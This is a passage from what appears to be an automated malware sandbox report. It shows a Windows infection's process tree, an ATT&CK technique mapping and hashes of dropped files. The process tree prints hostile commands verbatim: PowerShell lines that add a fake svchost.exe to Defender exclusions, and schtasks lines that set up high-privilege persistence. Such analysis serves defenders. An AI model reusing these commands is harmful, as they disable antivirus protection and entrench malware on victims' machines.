  "C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4624
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 572
    3⤵
    - Program crash
    PID:3384
- C:\Users\Admin\AppData\Local\Temp\Files\CritScript.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\CritScript.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:232
- - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
    "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4516
  - - C:\Users\Admin\AppData\Roaming\Java\jusched.exe
      "C:\Users\Admin\AppData\Roaming\Java\jusched.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1816
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4504
- C:\Users\Admin\AppData\Local\Temp\Files\CE5M.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\CE5M.exe"
  2⤵
  - Executes dropped EXE
  PID:2108
- - C:\Users\Admin\AppData\Roaming\All function.exe
    "C:\Users\Admin\AppData\Roaming\All function.exe"
    3⤵
    - Executes dropped EXE
    PID:4720
  - - C:\Users\Admin\AppData\Roaming\ALL slumzick.exe
      "C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"
      4⤵
      Executes dropped EXE
      PID:1696
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4836
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4672
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2208
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1672
- C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4544
- - C:\Windows\system32\runtime.exe
    "C:\Windows\system32\runtime.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2572
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1068
- C:\Users\Admin\AppData\Local\Temp\Files\RunTimeBroker%20(2).exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RunTimeBroker%20(2).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4836
- C:\Users\Admin\AppData\Local\Temp\Files\system32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\system32.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:3928
- C:\Users\Admin\AppData\Local\Temp\Files\ddosziller.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ddosziller.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "tesst" /tr '"C:\Users\Admin\AppData\Roaming\tesst.exe"' & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5116
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "tesst" /tr '"C:\Users\Admin\AppData\Roaming\tesst.exe"'
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6732.tmp.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2872
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2068
  - - C:\Users\Admin\AppData\Roaming\tesst.exe
      "C:\Users\Admin\AppData\Roaming\tesst.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3868
- C:\Users\Admin\AppData\Local\Temp\Files\Krishna33.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Krishna33.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1736
- C:\Users\Admin\AppData\Local\Temp\Files\image%20logger.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\image%20logger.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:644
- C:\Users\Admin\AppData\Local\Temp\Files\handeltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\handeltest.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4972
- C:\Users\Admin\AppData\Local\Temp\Files\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Client.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3692 -ip 3692
1⤵
PID:4196

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4624 -ip 4624
1⤵
PID:1700

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1240

C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2836
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5056

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3100

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
PID:1524

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:956

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
PID:1144

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:3096

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
PID:3560

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:4520

C:\Users\Admin\AppData\Roaming\Steam.exe
C:\Users\Admin\AppData\Roaming\Steam.exe
1⤵
- Executes dropped EXE
PID:1784

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

Filesize
2KB

MD5
15eab799098760706ed95d314e75449d

SHA1
273fb07e40148d5c267ca53f958c5075d24c4444

SHA256
45030bd997f50bb52c481f7bc86fac5f375d08911bcc106b98d9d8f0c2ce9778

SHA512
50c125e2a98740db0a0122d7f4de97c50d84623e800b3d3e173049c8e28ff0fbe4add7677bc56cb2228f78ed17522f67ae8f1b85f62824012414ce38ce0b500c

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
1301a13a0b62ba61652cdbf2d61f80fa

SHA1
1911d1f0d097e8f5275a29e17b0bcef305df1d9e

SHA256
7e75ad955706d05f5934810aebbd3b5a7742d5e5766efd9c4fc17ee492b2f716

SHA512
66aa4261628bb31ee416af70f4159c02e5bbfbe2f7645e87d70bb35b1f20fa915d62b25d99cd72c59580d1f64e6c6b5ad36ace6600d3bcdb67f45036d768ed8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5kUW3drUEbdR.bat

Filesize
207B

MD5
8a7a5451612a64227dcca199e1a5f387

SHA1
a4b4b718d61f27a1657acd4f057ba0091181270f

SHA256
964ac5bc961a4063595718a18345da36072736b505722862b3f32539587e9c8e

SHA512
b421047580f18c4adb7d6c36706b3c682c51bed7a9a9b4a12930fe9b875df0d715b2d4000d3362583cd73442946c30f8ff687e9b8e2356e5276e152df213872f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

Filesize
268KB

MD5
de45ebaf10bc27d47eb80a485d7b59f2

SHA1
ba534af149081e0d1b8f153287cd461dd3671ffd

SHA256
a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21

SHA512
9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe

Filesize
550KB

MD5
88783a57777926114b5c5c95af4c943c

SHA1
6f57492bd78ebc3c3900919e08e039fbc032268a

SHA256
94132d9dde2b730f4800ee383ddaa63d2e2f92264f07218295d2c5755a414b6a

SHA512
167abcc77770101d23fcc5cd1df2b57c4fe66be73ea0d1fde7f7132ab5610c214e0af00e6ff981db46cd78e176401f2626aa04217b4caf54a249811bbf79d9c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe

Filesize
748KB

MD5
3b4ed97de29af222837095a7c411b8a1

SHA1
ea003f86db4cf74e4348e7e43e4732597e04db96

SHA256
74656a65e96590a2734384bf89cb9ff677dcedff5f6e937d350b9f46ec52cd0a

SHA512
2e1d1365163b08310e5112063be8ebd0ec1aa8c20a0872eef021978d6eb04a7b3d50af0a6472c246443585e665df2daa1e1a44a166780a8bf01de098a016e572

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\CE5M.exe

Filesize
14.1MB

MD5
f33eeceda472b6cc6b7880dbba4f4d1f

SHA1
f7aadb89b32d89f593b4c1064d29209496468460

SHA256
beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a

SHA512
d552017090cf1b77d8ad4f9fe91cc8ad8a7ca915d2ae446c31102990119b4923df0b666e7e39df8f55152c8308f926e8eb6dd4289e870f927e4076ec1bd46387

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe

Filesize
3.2MB

MD5
12bae2d19de4df6c0325e70c73b5224f

SHA1
e5ca184f49b3cbfb817315dff623aefe3c44fe08

SHA256
a9b4c1d130aaadee170d4def45d3b73e26847c38e1ad6bbb05589953c2016bdb

SHA512
2666bb29e7f676e2a9e5a2e4bb610ad589ecb0a1473ad1ec1154488fd1a3460e0b0ed7f9f4717c56353e0d016fef19964784fd74a2786624adb125126139bce2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Client.exe

Filesize
45KB

MD5
b6811a1daca8cfda16da0f730c174133

SHA1
92d67d3836def51f5a45389692292b2998a0c559

SHA256
d5619e740a38ee0c894dd17051419306c4b35ad55a1558854ed82527a4aa736c

SHA512
c1fe4b8edc38eef9ce12ae56f7874690b50519b12560620766c7e0b9f6a8cf1f9d00f648f6fa15b328320435e013bccae2dd2195985d8121ffc3c16b521b857d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\CritScript.exe

Filesize
3.2MB

MD5
c28dc010fc5198442496bc07dd50cd5d

SHA1
0f90a005815c2700a65ea85ae86f13a182cc11e6

SHA256
1b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3

SHA512
7c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Krishna33.exe

Filesize
97KB

MD5
1ebef0766160be26918574b1645c1848

SHA1
c30739eeecb96079bcf6d4f40c94e35abb230e34

SHA256
3e664b59ba376749eb9b596b6499bf7edcec5d34382ead80964f9fe92a4c3c83

SHA512
01c42bb22a92543a3408c6f420593443357a53915937341b5eaf8563ee775dbdeba7af38e2df9c9cf249a512a5a42c65c4c4d39d100e8a4143e58fd235b85951

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\RunTimeBroker%20(2).exe

Filesize
3.1MB

MD5
ff7d780fa5f307da8d52650d52c9f0f7

SHA1
3d687e6aa07995b8415a74cb5700b1abdb48ae3b

SHA256
ed340526b36db90f266db2a5f1c48c109ecc51ea6bdb9e907240c3da858b74e4

SHA512
4ba9b40ae829bec98a7bb156cb574d820b4aaaf4958d0543c9946afa2f5cbfc6989e6bed9ef507f16d9d540e7e85aab24be8d7a87689242610e586f270271e8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

Filesize
41KB

MD5
0897b11d95ee6b03e0aa842a221983c9

SHA1
b1bd0eb1d20bd70706f3a19707719fad18aa4365

SHA256
880cb80d1d206d83854ee3e6a2ffd5d25a1d3acaa2aa1513842243af5fee233a

SHA512
39bdcf88660ee14a0c6b3b6d2402991ab80bbfa05b526cd6d5b10c035a6ebf63b349b3f2c9532f048301f8415c2bbed57bc0f4409273fe8ec2014a63dbd9dc72

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe

Filesize
4.6MB

MD5
333e51675c05499cfadd3d5588f0f4ca

SHA1
aca16eda7f33dfb85bed885e2437a8987d7a09e4

SHA256
cdc184f53927538be9c65604552977077e645e7e2d1e491ae357f15c14a78407

SHA512
5c0a9609be977c5ee3561516791437afca6159d82955dc23ede5e6376f66df98d0e2d74f068ad2f350115cddf978450dfc17d0f97493a8128336e76a724ad335

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ddosziller.exe

Filesize
47KB

MD5
fcd50c790fc613bb52c7cea78a90d7ba

SHA1
06197d1e57e63af0b898de2b8388c447e2c6cc71

SHA256
1a626198cb756125b04335293477b64d6bf0b8c1a3c9dbee117afd247fa477d6

SHA512
1e9c923d08fae0818ba190efa1f7199ded9a04687022832730107cc9f9383262da14555d06f366df2b73123182ad4c9033a7205efc75b9535e39b8e676aef86c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\handeltest.exe

Filesize
8KB

MD5
fc58aae64a21beb97e1f8eb000610801

SHA1
d377b4da7d8992b0c00455b88550515369b48c78

SHA256
a9da5745b96d84d4933b62dd790563ecdf59b5cf45009a192e886dc39c80c389

SHA512
601d661020e204565d21a1b7cedc5c081be2a88c226cd7152be6d3ea0ccc72161dcec68026f344028e5409e08178877639d5d6a46564d8e3d68236e484fc03d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\image%20logger.exe

Filesize
312KB

MD5
520e6035e15a9422e1c4cbada69263aa

SHA1
96915e5d6adf90533c2309c84e226598773d83ec

SHA256
99a06d8a9eda7ba2d19da54c2759a783e20922a73a4893caccc220cdaa27a883

SHA512
ffcf1ff0d9161bdc9c1bbdedc66bccb8bcf74874d25ff4f4436c57aa417160c55914ccb9cb97645c728dd4d230908f707733c30c53faeb0bbfd71e6306999b3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\skibidi.exe

Filesize
3.1MB

MD5
5c73e901190eb50c2794a879a354417d

SHA1
e7e0e5552b9656e3790aa748f9af8774b606ed66

SHA256
7ccfce0efe92cb5edd40257ce119bc91b50012c8081cb639aad6caab663a3ff6

SHA512
fc3bb5c1c6b2917e6169cfc7633f91335eda82c68518f801e26805fc6381afb54508dbc689eb7c946ebe5e6195b37daa1639243e3fef3ee2073dbb1aa8495fd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\system32.exe

Filesize
25KB

MD5
3386d440d3907b4c9322f7842a914026

SHA1
31402ac6467747beaea5957dffcba88d7ca9a249

SHA256
70c8b18ece14adc1d775e9eb5c4de116f2d4a283818ad69dd967fc1127130ec2

SHA512
d2f2cf13448960e4a71de312d9f8edc9083b4964394407c98ac06108aa6d27d8f0c1f6ccabb3e816896585b896425e18cf9760ccccd0315df970446d4dce0abd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\windowshost.exe

Filesize
3.1MB

MD5
5cb4036d3d3ca0763b46b3bdba8c1965

SHA1
bbde77750e5d55d6b264a39955e90f4d54b04f49

SHA256
678eeaa749e18183f9f8cb828c64f5da6989f07fb42c0e5a98747e60b3af3bf3

SHA512
d474c35687f91a26af3a0282a1e182835c6790fe6f5545e600aefe2eebe29fdff2d45022c74cab7eef350ae4121cea2d759f92a4fcaa800ebda6868a632d3d8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe

Filesize
227KB

MD5
f25ef9e7998ae6d7db70c919b1d9636b

SHA1
572146d53d0d7b3c912bc6a24f458d67b77a53fe

SHA256
7face24db4aa43220ebc4d3afb6c739307f8b653c686b829fb1cb6091695c113

SHA512
d8682cdb5876f9ffe6aa8856d5ffa8c168afd25fc927781d80d129491fa04aabf045f01d13ffb51e3db9773367cc00fce466e1ef7af11bfc3d7af13df06cc17c

Download Submit
C:\Users\Admin\AppData\Local\Temp\JGpDffi2eHvm.bat

Filesize
207B

MD5
300cd8dd3be5366a86325c829e43987b

SHA1
add3f4a9e8d33a6a448f2f540819fe7da82e5fe6

SHA256
16d1415c5d8834753d16caf362e5d4cda3b35aae5c97e9ed4937ce712f3c4974

SHA512
6ee4a369ffca33dd270ddf7e89903376ce8e41b3b33d6b8e0bb479001806c879a28a78b8b23c25e84c9dffe1c05f3816edf658ef1be5aafaa86d803e36167073

Download Submit
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

Filesize
3.1MB

MD5
bd4dcbdfdb5fdc1f95bd1168f166153a

SHA1
9db60cf0f8a8b88d3c4601df25963536aaeb1884

SHA256
902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

SHA512
26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\OVfdBzjK3mKe.bat

Filesize
207B

MD5
6b37ffc1103bb0db8e3468f3af5b5b7e

SHA1
392a9b69982f2a127f47b492a61ac2087892124f

SHA256
19f0022d7d2daeca9fa133ec7bec26db0fc9d5fd7a95d3aa66a20b33653fc953

SHA512
c051980e07b259085b20d923671d95e007565ddddbaee7241398390adbfe2cce851b5bc2f3a1b5928ecae61d8627a9f31f9093f16d45b91026985ef15366c8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\VtAjv4VqSMPH.bat

Filesize
207B

MD5
5e421b3b828025e784cf9cf8ae2cb151

SHA1
11148dff641d551cc68ea64682f26b7ecdad6b73

SHA256
f9c73396765ac736040aad3fb35b173275c9854ac099d358013b9d5858331208

SHA512
4ba8c101c273c6859ab7395af0c984a30b1d809e857742762d15317698330a01cb53d11ba2d58916face595ab1a7f7725b4d529b1839f8b729a7b36a7419af88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\Crypto.Cipher._AES.pyd

Filesize
28KB

MD5
d1c939cffc6f39a670432382fcd30295

SHA1
7485277c300f009e51f7535bed1bcfce6566edec

SHA256
9ed12c67a52f4260bda9dfa993667ce7bbdd9416dafc2b6e7bd27e76fc28f4e4

SHA512
30e24eb647c29541616061291ffe7db91096c5cc6a4e8620d41714d337b128887fcfe12f68b6a6e368b75e086ca8831c8b973ca570d8d7180dca383a20da54f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\Crypto.Cipher._ARC4.pyd

Filesize
8KB

MD5
fe57b01d7dbb04bf98681b8931fffaf1

SHA1
857bc955ab973a5d46785fc0091e656995dfc220

SHA256
cf327b3ba51174172233a897e325198b1e3b72b2f4420cb58b53f586fb76bfa6

SHA512
964ba77ae7a0d6bbde7c1514f704252feedc550b98f95ae66f289b6b6bb43182cc7b38893beb9f976f0abed1a16837c8d994f47af306b086d9aff0ea3991e0d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\Crypto.Cipher._DES.pyd

Filesize
53KB

MD5
3ea65a7a907fa6b93a8225a9d212e078

SHA1
cd0818a429eef3d2a02c9f402fea9b08dba9ccde

SHA256
9ba3544a6d4bc02634895b758a7485646d8fd4af3efa8e4b459dec8d5cb0d428

SHA512
0f5b6c45bfff1cc4f72e2fae914094b9b80bdaf5e3a2e4903bee6c1b8b1b830f43768c3e2b778ce16a41535c120a8562400db88027165d8a0c36a15a60614133

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\Crypto.Util.strxor.pyd

Filesize
7KB

MD5
1239323b388874e102b2c849d83b4af3

SHA1
f364995dfd8e831941a739f327203952973b7437

SHA256
cc7cb8651a209ed6366690b3533b3e3893491397e200fa4bd1ee967c6dadbc89

SHA512
d9f30e188bff8427990b18ca9996888fffb7f754d893b5eddb05c1d65fe0bed35d0971c77168566bcbed48b2a8e7387d0693d8c41ab0a46e1997ba8aff7a8797

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\_ctypes.pyd

Filesize
85KB

MD5
6af3148bb46d4e4e3e3aa361ac1eca90

SHA1
49dc2339419644e8bc6c19fbddd2c80224e56804

SHA256
1d0a560cdc8b4af3b38222a940f20068fa7e9139f698b0bc72b17e9a0ce25ef4

SHA512
7cf4cffece718b662a556acc410047547a7dabb902620077f9a2886c945f87e6369a4dfd9fb57290285570bd94e86c03f9a6cea0283aa5eb888977ae99ff037c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\_hashlib.pyd

Filesize
698KB

MD5
3c58062b89379f2d29a12bffd3d01af8

SHA1
0e0cf91da17d972f02a4983e7dc67142d89b2f4e

SHA256
706beba9f66b1422ac45f35e9094846f1e6e76cf1120fcab0835ea6be4236b61

SHA512
54cf110b88fa2ee2d69a03952776cf1a3022ab3d340aa71bc79e90725262f2c946cf5bcc719756b483a5dfacf38ba5dca09efc39cbb8a400165efe140ab2fcd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\python27.dll

Filesize
2.3MB

MD5
676fc65e4a49a525df0ecde3596f3ae5

SHA1
e125975958b08207be081e94ca1674fec0bcec98

SHA256
c9192fe69d7eef69b1e27e630ae643dcb0838b7bc0ac43e69a979f5a726256c1

SHA512
3a4dde17cbe3eb60c5ce6f3bc58c24769835c9fcef091df5883b47e058516b15be2dc28a49e3a360ee3e5da8e4c6845cbcfc05e0042ae2d592efc13778a23c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\pywintypes27.dll

Filesize
107KB

MD5
f3ef005e60f838eaaa44529daeeb93ab

SHA1
0f8730caea9f7b16c2e90f6551a90b80b994688f

SHA256
241ecbd87410e9b23339d494f9eca7ddf8083472661989f489fdd7fe0b8776b4

SHA512
8c57d5b6a5b44b26fb943b0d5ddd5d80eeac2488e91f538e361781e727f931717bb3d5a0811ae7c8dd85122e74b08c54c3384fd2fc0db79e0b0e7fbfc8160d20

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32api.pyd

Filesize
98KB

MD5
904347cc428ecc1fb6dec20ad6350519

SHA1
1547b616784c39abdaa4699994b2f9ad539180ce

SHA256
ff781837e47a42d7dee3d42854b6d66d73cfbc032c47c9620821b737a82800af

SHA512
cd2612c9fb2b9aa92e504fe1a830b752962b06819356aeeebaaaf53853ebb676d7bc4497fd88ec0be2b32895f6957682c1571914ff657b49261d275bbd2f0204

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32cred.pyd

Filesize
25KB

MD5
